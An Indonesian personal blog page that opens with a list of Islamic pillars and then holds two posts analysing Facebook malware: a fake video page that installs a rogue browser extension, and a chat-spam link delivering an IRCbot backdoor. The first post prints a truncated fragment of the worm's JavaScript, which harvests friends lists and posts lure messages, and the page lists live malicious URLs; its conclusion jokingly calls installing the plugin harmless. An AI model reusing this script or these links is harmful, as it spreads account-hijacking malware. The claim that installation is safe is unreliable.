PENTING!!!


Rukun Iman terdiri dari enam perkara: (1) Iman kepada Allah. (2) Iman kepada malaikat-malaikat Allah. (3) Iman kepada kitab-kitab Allah. (4) Iman kepada rasul-rasul Allah. (5) Iman kepada hari kiamat. (6) Iman kepada Qada dan Qadar.

Rukun Islam terdiri dari lima perkara: (1) Mengucap dua kalimat syahadat. (2) Menunaikan shalat lima waktu. (3) Mengeluarkan zakat. (4) Berpuasa pada bulan Ramadan. (5) Menunaikan Haji bagi mereka yang mampu.

Menelusuri Penyebaran Link Video Nakal Pada Wall Facebook

Tidak jauh beda dari posting sebelumnya, kali ini saya akan membahas tentang penyebaran link nakal melalui wall pada Facebook.

Hal ini bermula saat beberapa jam yang lalu salah satu teman saya mengirim sebuah link "video" yang menurut saya cukup menarik..


Bagaimana? menarik bukan? :D

Setelah saya "jalan-jalan" ternyata bukan cuma saya yang mendapat kiriman link tersebut. Beberapa teman saya juga terkena imbasnya, tapi tenyata teman-teman saya sudah pada canggih.

Canggih koq masih ada yang kena?!

Hmm.. saya rasa itu karena dia (korban) terlalu mengedepankan nalurinya sebagai lelaki. Haha :D coba lihat..


Jika sebagian dari anda sudah tahu akan hal ini dan sebisa mungkin mencoba menghindarinya. Saya justru "gatel", penasaran.. "bisa apa sih?". Untuk itu, langsung saja kita telusuri lebih dalam isi link tersebut.

Saya mulai dengan membuka link yang diberikan : http://fbviralvideos.blogspot.com


Wow, sangat mirip dengan halaman video di facebook. Tapi saya rasa ini cuma cloning.

Fokus Pada Area Video

Di situ dijelaskan bahwa saya anda tidak dapat memutar video tersebut karena keterbatasan plugin Divx, dimana plugin tersebut merupakan premium plugin dari Youtube. Saya Anda diminta menginstalnya terlebih dahulu sebelum dapat menyaksikannya.

Setelah saya cari tahu, ternyata isi dari area tersebut diambil dari http://pluginplugin.blogspot.com yang disuntikan kedalam area video.


Sampai disini tidak akan terjadi apa2, kecuali anda meng-klik "Install Plugin". Apa yang akan terjadi?

Saat "Install Plugin" di-klik, browser akan bertanya apakah anda mengizinkan plugin tersebut "berkiprah" pada browser anda? Jika anda memberikan allow, maka plugin tersebut akan langsung ter-install setelah tombol "Install Now" anda tekan.

Sampai disini juga belum terjadi apa-apa.

Lho! Trus kapan?

Hoo.. sabar.. :)

Link nakal tersebut baru akan menyebar setelah anda me-restart browser anda.



Maaf, demi kenyamanan teman-teman facebook saya, pada contoh kasus ini saya login menggunakan account rahasia :p

Apa yang terjadi?

Dibawah ini hanya merupakan potongan script yang berkontribusi dalam penampilan link tersebut, sengaja tidak saya tampilkan semua karena akan menyalahi kode etik dunia persilatan :p

...
var randomnumber=Math.floor(Math.random()*10001) var video_url='http://fbviralvideos.blogspot.com/#'+ randomnumber +''; var domains=['http://i.imgur.com/piRgr.png']; var p0=['Check this','Its funny...','You will like..']; var p1=['hey','Hey','Ey!','Wazzup','Hello!','Look!','Great','Incredible!']; var p2=['this is really hot!','Look now!','hahaha!']; var p3=['HOT Girl Shows Her Breast on Live TV']; var message='';var a;gf=new XMLHttpRequest();gf['open']('GET','/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer='+uid+'&'+Math['random'](),false);gf['send']();if(gf['readyState']!=4){}else{data=eval('('+gf['responseText']['substr'](9)+')');if(data['error']){return false;}else{a=data;}} var b=a['payload']['entries']['length'];if(b>30){b=30};var cook=readCookie("fb_video_"+user_id);if(cook=="activo") return false;message=[randomValue(p1),randomValue(p2),randomValue(p3)]['join'](' ');var c=new XMLHttpRequest();var d='http://www.facebook.com/ajax/profile/composer.php?__a=1'; var title='HOT Girl Shows Her Breast on Live TV!!!'; var summary='HOT Girl Shows Her Breast on Live TV'; var imagen='http://i.imgur.com/piRgr.png';
...

Solusi

Apa bila anda sudah terkena (teman-teman saya bilang) "virus" itu, silahkan uninstall plugin Youtube extension yang ada pada browser anda. Pada Mozilla Firefox itu dapat dilakukan dengan masuk pada menu Tools >> Add-Ons lalu pada tab Extension cari Youtube extension lalu klik Uninstall dan restart browser anda.

Kesimpulan

Pada contoh kasus kali ini, silahkan anda klik link tersebut, silahkan anda install plugin yang direkomendasikan, tidak usah takut toh tidak akan terjadi apa-apa selama browser anda tidak di-restart :D

Menelusuri Spam Chat Pada Facebook

Pagi ini saya mendapat hadiah dari salah seorang teman saya melalui akun jejaring sosial. Walaupun sebagian besar orang menganggpnya musibah, tapi ini merupakan berkah tersendiri bagi saya karena memang akhir-akhir ini saya babar blas tidak memiliki ide untuk posting. Mau tahu apa isi hadiahnya? Ayo kita buka bersama-sama. :)

Ini bungkusnya :



Ketika saya coba buka url yang diberikan (http://bit.ly/t365PB) pada browser, url tersebut mengarah ke sebuah halaman yang tentunya tidak asing bagi kita :



Wah.. baru tahap pertama sudah sangat menarik. Ternyata url tersebut mengarah ke Rapidshare. Eh, tunggu-tunggu! Koq urlnya http://www.thepondworld.com/users/dn.htm?id8h7r-Picture25.JPG. Sejak kapan Rapidshare ganti domain? :D

Ada satu lagi yang aneh, coba lihat ke taskbar saya! kotak dialog download IDM langsung keluar tanpa diminta menunggu sekian detik. Kayanya saya belum pernah beli premium account :p

Lanjutt..

Pada saat file tersebut selesai didownload, berukuran 121,20 kb, dengan nama "Picture25.JPG.zip"




File yang sama juga saya dapatkan setelah mengakses url lainya yang diberikan.

Setelah saya extract, terdapat sebuah file bernama "Picture25.JPG_www.facebook.com" dengan tipe MS-DOS Application sebesar 133 kb.

Disitu terlihat bahwa file tersebut bereksistensi .com yang merupakan eksistensi dari bahasa pemrograman tingkat dewa yaitu assembly :D tapi setahu saya eksistensi .com hanya berukuran maksimal 64 kb, sedangkan file tersebut berukuran 133 kb.

Hmm.. untuk memastikan, saya coba membuka file tersebut menggunakan notepad. Ternyata berawalan "MZ". 

Saya tidak punya presepsi lain lagi (karena memang hanya sebatas itu pengetahuan saya. hehe..) selain meyakini bahwa file tersebut benar-benar dibuat menggunakan bahasa assembly dan bereksistensi .com tapi kenapa ukurannya bisa lebih dari 64 kb? Entahlah, waktu kuliah teknik digital walaupun duduk paling depan tapi saya jarang memperhatikan, sedangkan di lab mikroprosessor saya cuma maen Spider Solitaire. :D

Setelah saya mematikan koneksi internet, langsung saja saya buka file "Picture25.JPG_www.facebook.com". Oleh windows defender, file tersebut terdeteksi sebagai Backdoor:win32/IRCbot.gen!k yang tidak lain dan tidak bukan merupakan trojan backdoor yang masuk dalam keluarga besar IRC-controlled backdoor trojans.

Ketika dieksekusi, malware tersebut akan meng-copy-kan diri ke direktori "%windir%" atau satu dari subdirektorinya seperti "<system folder>" atau "%windir%\system", itu berarti dia akan aktif saat sistem startup.

Sehebat Apa Backdoor:Win32/IRCbot.gen!K?

Setelah terinstal, Backdoor:Win32/IRCbot.gen!K akan menghubungkan dirinya ke server IRC menggunakan port tertentu.

Kemudian tinggal menunggu perintah dari pemegang remote (attacker). Perintah-perintah tersebut tidak terbatas, pada umumnya seperti:
  • Download dan menjalankan file
  • Melakukan update
  • Mengumpulkan informasi sistem
  • Menjalankan berbagai server pada sistem
  • Mengirim email ataupun instant messages
  • Merpartisipasi (membuat komputer kita menjadi zombie) dalam serangan DDoS
Nah, sekarang anda sudah bisa membayangkan kan apa yang mungkin terjadi bila anda sedikit saja ceroboh?

Sampai disini saja, sengaja saya tidak melanjutkan menelusuri sumber biang kerok, karena selain ilmu saya masih terlalu cetek, itu akan melanggar kode etik dunia persilatan! :p